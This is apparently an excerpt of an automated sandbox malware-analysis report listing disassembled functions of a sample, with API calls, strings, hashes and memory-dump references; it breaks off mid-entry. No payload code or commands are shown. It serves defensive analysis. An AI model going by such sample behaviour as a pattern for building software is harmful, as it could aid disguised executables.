    • Opcode Fuzzy Hash: 38ac81b79ffeddfcb476ba11cddfc2ab528f25f0e476b9b6ed070ed220efb868
    • Instruction Fuzzy Hash: 8B81B1B2208741AFD710DF68CD89A7BBBE9FB89704F04092DFA84D7251D774E8098B52
    Function 0006DCD2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • ___free_lconv_mon.LIBCMT ref: 0006DD16
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D8CE
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D8E0
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D8F2
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D904
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D916
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D928
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D93A
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D94C
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D95E
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D970
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D982
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D994
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D9A6
    • _free.LIBCMT ref: 0006DD0B
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006DD2D
    • _free.LIBCMT ref: 0006DD42
    • _free.LIBCMT ref: 0006DD4D
    • _free.LIBCMT ref: 0006DD6F
    • _free.LIBCMT ref: 0006DD82
    • _free.LIBCMT ref: 0006DD90
    • _free.LIBCMT ref: 0006DD9B
    • _free.LIBCMT ref: 0006DDD3
    • _free.LIBCMT ref: 0006DDDA
    • _free.LIBCMT ref: 0006DDF7
    • _free.LIBCMT ref: 0006DE0F
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 61c351c72bf9d3cbbfec7404cca60ee6a870e8c7847088c0e4b251910f3c5c3f
    • Instruction ID: 9c6e09abb802f74484d7de5c10a8bb85d5d1689b9774b8afe9e4872da4d2e2ae
    • Opcode Fuzzy Hash: 61c351c72bf9d3cbbfec7404cca60ee6a870e8c7847088c0e4b251910f3c5c3f
    • Instruction Fuzzy Hash: 20314A31F002049FEB60BA38D849B9673EAFF51311F18442BF459E7152DE31AC54CB25
    Function 0004C3F7 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 210comCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0004C3FC
    • CoCreateInstance.COMBASE(000768A0,00000000,00000001,000767D0,?), ref: 0004C41E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateH_prologInstance
    • String ID: Name$Pzv$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
    • API String ID: 457505298-2036231139
    • Opcode ID: 66ea4a3561ed154572dac131caa4be3e287508ad79f5b6a5d3f70371cb6745ad
    • Instruction ID: 84e151cd41ab1ba40bad8e7100fefa7b2faa9933b50550d8b18830e8365c2ac8
    • Opcode Fuzzy Hash: 66ea4a3561ed154572dac131caa4be3e287508ad79f5b6a5d3f70371cb6745ad
    • Instruction Fuzzy Hash: 6F717FB1A016199FEB54DFA4CC94DBEB7B9FF88310B044169F506A72A1CB34AD41CB54
    Function 0005A6C1 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 0005A6E6
    • _wcslen.LIBCMT ref: 0005A786
    • GlobalAlloc.KERNEL32(00000040,?), ref: 0005A795
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0005A7B6
    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0005A7DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
    • API String ID: 1777411235-4209811716
    • Opcode ID: 33b1dc1bebdc8d5d4d63408e5780781b1708e8bab32528f7bb4e4021f74ea8ae
    • Instruction ID: 188a4817dc460f51367a2abfb6f79fd7ea1653e1243b34f552acb4731a4cd562
    • Opcode Fuzzy Hash: 33b1dc1bebdc8d5d4d63408e5780781b1708e8bab32528f7bb4e4021f74ea8ae
    • Instruction Fuzzy Hash: 25316C316087057EE714AB609C06FAF77A8EF46722F14061EF905961C2FF68994D83A6
    Function 0005E7DE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
    Download Yara Rule
    APIs
    • GetWindow.USER32(?,00000005), ref: 0005E801
    • GetClassNameW.USER32(00000000,?,00000800), ref: 0005E82D
      • Part of subcall function 00053306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0004D523,00000000,.exe,?,?,00000800,?,?,?,00059E4C), ref: 0005331C
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005E849
    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0005E860
    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005E874
    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0005E89D
    • DeleteObject.GDI32(00000000), ref: 0005E8A4
    • GetWindow.USER32(00000000,00000002), ref: 0005E8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
    • String ID: STATIC
    • API String ID: 3820355801-1882779555
    • Opcode ID: 52076b594d24c20312f1c8b75afaa1ed4dc66bc9e9c86758e71c58c9129ee5b2
    • Instruction ID: 7a472bf4c4679154dc9d202113e8c140fad06332d038d69c5f6ec38661c991a8
    • Opcode Fuzzy Hash: 52076b594d24c20312f1c8b75afaa1ed4dc66bc9e9c86758e71c58c9129ee5b2
    • Instruction Fuzzy Hash: 9B11C372644E507BE2216B60DC49FBF369CBF46713F000135FE85A6092DB689E0A86B5
    Function 0006A411 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 0006A425
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006A431
    • _free.LIBCMT ref: 0006A43C
    • _free.LIBCMT ref: 0006A447
    • _free.LIBCMT ref: 0006A452
    • _free.LIBCMT ref: 0006A45D
    • _free.LIBCMT ref: 0006A468
    • _free.LIBCMT ref: 0006A473
    • _free.LIBCMT ref: 0006A47E
    • _free.LIBCMT ref: 0006A48C
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: abe211173ba0f0e78ec5d88d4827a281f37e8e6de31ad5560505355908ae48a5
    • Instruction ID: 3f5227c67212429511d2e205c81da4972172d003cdacaa23c9f4e291bdfec800
    • Opcode Fuzzy Hash: abe211173ba0f0e78ec5d88d4827a281f37e8e6de31ad5560505355908ae48a5
    • Instruction Fuzzy Hash: 6411A476A00108BFCB01FF54C856CD93BA6EF15351B5580A1FA1C9B223DA31EE519FA2
    Function 00063FB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 322700389-393685449
    • Opcode ID: 69b7a78fd485cdbb9b72a84a107aad850069e49410e191c54a87e2cf1f293f0d
    • Instruction ID: da01ac37f6c663f6e9c886973bfb115afcbfdb6ae8d720b9dece3c9dec2ebeab
    • Opcode Fuzzy Hash: 69b7a78fd485cdbb9b72a84a107aad850069e49410e191c54a87e2cf1f293f0d
    • Instruction Fuzzy Hash: E3B18971C0021AEFCF29DFA4C8819AEBBB6FF15310F64416AF9156B212D731DA61CB91
    Function 0005C7A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005C7F0
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005C817
    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0005C830
    • SetWindowTextW.USER32(?,?), ref: 0005C841
    • GetDlgItem.USER32(?,00000065), ref: 0005C84A
    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0005C85E
    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0005C874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: MessageSend$Item$TextWindow$DialogParent
    • String ID: LICENSEDLG
    • API String ID: 4098686847-2177901306
    • Opcode ID: ddcc9b8d509bec2eb541352b6ed251d3de54b210f21484b632db93960b674659
    • Instruction ID: a85f3cc80ebb5eaa303435e278f1d4ce7084917c03a9f7d53d31bcb96177cdf5
    • Opcode Fuzzy Hash: ddcc9b8d509bec2eb541352b6ed251d3de54b210f21484b632db93960b674659
    • Instruction Fuzzy Hash: 8B219132244A057FF6115B65EC49FBB3AACFB4BB97F004019FA41E60A1CF6A98059A71
    Function 0004B5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 0004B5E2
      • Part of subcall function 000526F1: GetSystemTime.KERNEL32(?), ref: 000526FF
      • Part of subcall function 000526F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 0005270D
      • Part of subcall function 0005269A: __aulldiv.LIBCMT ref: 000526A3
    • __aulldiv.LIBCMT ref: 0004B60E
    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B615
    • _swprintf.LIBCMT ref: 0004B640
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • _wcslen.LIBCMT ref: 0004B64A
    • _swprintf.LIBCMT ref: 0004B6A0
    • _wcslen.LIBCMT ref: 0004B6AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
    • String ID: %u.%03u
    • API String ID: 2956649372-1114938957
    • Opcode ID: 1bf1ff2a0c7ea057e2426e7d7ea1187b3acab79b2743b2026d6372e1b81a1715
    • Instruction ID: c6ed24032e72e23b1501f7765508a9cf8763fde14d0425c328d53e5937552800
    • Opcode Fuzzy Hash: 1bf1ff2a0c7ea057e2426e7d7ea1187b3acab79b2743b2026d6372e1b81a1715
    • Instruction Fuzzy Hash: 0C2181B2A083006FD714EF65CC85E9BB7ECEB94700F00493AF589D7242DB34DA0887A6
    Function 0005BC1B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
    Download Yara Rule
    APIs
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC2F
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC40
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC4E
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC5C
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC77
    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC9E
    • _swprintf.LIBCMT ref: 0005BCC4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
    • String ID: %s %s
    • API String ID: 385609497-2939940506
    • Opcode ID: f0215e77af40bafeb5ff647e82450f247bd9a44924a5192f5d3007d5170a3404
    • Instruction ID: 9c4cb6fe8e84faaf40fbd56d4df0f1967bb01144201ca82bf30d415aff4f8613
    • Opcode Fuzzy Hash: f0215e77af40bafeb5ff647e82450f247bd9a44924a5192f5d3007d5170a3404
    • Instruction Fuzzy Hash: 7921DBB294115CABEB11DFA0EC44EEF3BACFF59305F540026FA09D2111E768DA89CB61
    Function 00060EC0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C43F,0004C441,00000000,00000000,2C2E0351,00000001,00000000,00000000,0004C32C,?,?,?,0004C43F,ROOT\CIMV2), ref: 00060F49
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C43F,?,00000000,00000000,?,?,?,?,?,0004C43F), ref: 00060FC4
    • SysAllocString.OLEAUT32(00000000), ref: 00060FCF
    • _com_issue_error.COMSUPP ref: 00060FF8
    • _com_issue_error.COMSUPP ref: 00061002
    • GetLastError.KERNEL32(80070057,2C2E0351,00000001,00000000,00000000,0004C32C,?,?,?,0004C43F,ROOT\CIMV2), ref: 00061007
    • _com_issue_error.COMSUPP ref: 0006101A
    • GetLastError.KERNEL32(00000000,?,0004C43F,ROOT\CIMV2), ref: 00061030
    • _com_issue_error.COMSUPP ref: 00061043
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
    • String ID:
    • API String ID: 1353541977-0
    • Opcode ID: b4230cf3ea02df08ca09426bd182ffc4aba4b8931646e0f8f545e469011b43ec
    • Instruction ID: ab5650f40d647887946976012fe849dbcece810b538e27cac83f22464f800346
    • Opcode Fuzzy Hash: b4230cf3ea02df08ca09426bd182ffc4aba4b8931646e0f8f545e469011b43ec
    • Instruction Fuzzy Hash: 29413A71A40215ABDB10DFA8DC45BEFBBEAFF48710F104229F509E7281D77998408BA5
    Function 0005E8CF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 0005E8EE
    • ShowWindow.USER32(?,00000000), ref: 0005EA5D
    • GetExitCodeProcess.KERNEL32(?,?), ref: 0005EA99
    • CloseHandle.KERNEL32(?), ref: 0005EABF
    • ShowWindow.USER32(?,00000001), ref: 0005EB21
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
    • String ID: .exe$.inf
    • API String ID: 783751319-3750412487
    • Opcode ID: 663ecbb70e172d5dd4d2dfd63aecc4c4e4088ab6c71ea83aa75813f537d6369a
    • Instruction ID: e83fd067537da3b89e57bf63d62ca145c77bdb4b8ab25e5e51b171db3365d2c6
    • Opcode Fuzzy Hash: 663ecbb70e172d5dd4d2dfd63aecc4c4e4088ab6c71ea83aa75813f537d6369a
    • Instruction Fuzzy Hash: 8251F1355087C0AAFB749B20D804ABB7BE5BF81746F04482DFDC597191EB749A8CCB52
    Function 0004A5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0004A5EE
    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0004A611
    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0004A630
      • Part of subcall function 0004D6A7: _wcslen.LIBCMT ref: 0004D6AF
      • Part of subcall function 00053306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0004D523,00000000,.exe,?,?,00000800,?,?,?,00059E4C), ref: 0005331C
    • _swprintf.LIBCMT ref: 0004A6CC
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • MoveFileW.KERNEL32(?,?), ref: 0004A73B
    • MoveFileW.KERNEL32(?,?), ref: 0004A77B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
    • String ID: rtmp%d
    • API String ID: 3726343395-3303766350
    • Opcode ID: f63162fa69fdcd92c43d0a6848c636eeb7dce7224fe6f3703be9947acf6cf48e
    • Instruction ID: 7f49a09b63601bf1aeecd4b35d0eff8cc0dfebd9137e1599f5ab3a0c7266ce0b
    • Opcode Fuzzy Hash: f63162fa69fdcd92c43d0a6848c636eeb7dce7224fe6f3703be9947acf6cf48e
    • Instruction Fuzzy Hash: F64180B1A441296ACF20ABA0CC44EEF73BCBF46341F0404B9B545E3046DB388A85CF69
    Function 00052528 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
    Download Yara Rule
    APIs
    • __aulldiv.LIBCMT ref: 0005253E
      • Part of subcall function 0004C619: GetVersionExW.KERNEL32(?), ref: 0004C63E
    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00052561
    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00052573
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00052584
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052594
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000525A4
    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000525DF
    • __aullrem.LIBCMT ref: 00052689
    Memory Dump Source
